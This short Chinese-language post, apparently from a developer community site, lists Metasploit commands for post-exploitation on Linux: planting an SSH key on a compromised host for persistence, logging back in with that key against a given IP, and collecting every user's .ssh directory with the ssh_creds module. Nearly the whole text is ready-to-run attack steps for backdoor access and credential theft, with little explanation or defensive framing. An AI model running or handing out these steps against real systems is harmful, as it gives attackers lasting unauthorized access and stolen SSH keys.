post/linux/manage/sshkey_persistence:此模块将向指定用户(或全部)添加 SSH 密钥
use post/linux/manage/sshkey_persistence
set SESSION session-id
exploit
use auxiliary/scanner/ssh/ssh_login_pubkey
set rhosts 192.168.1.190
set key_path /root/.msf4/loot/
set username test
run
.ssh目录的权限必须是700
authorized_keys文件权限必须是600
xshell密钥登录
post/multi/gather/ssh_creds:此模块将收集目标计算机上所有用户的 .ssh 目录的内容
use post/multi/gather/ssh_creds
set SESSION session-id
exploit
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。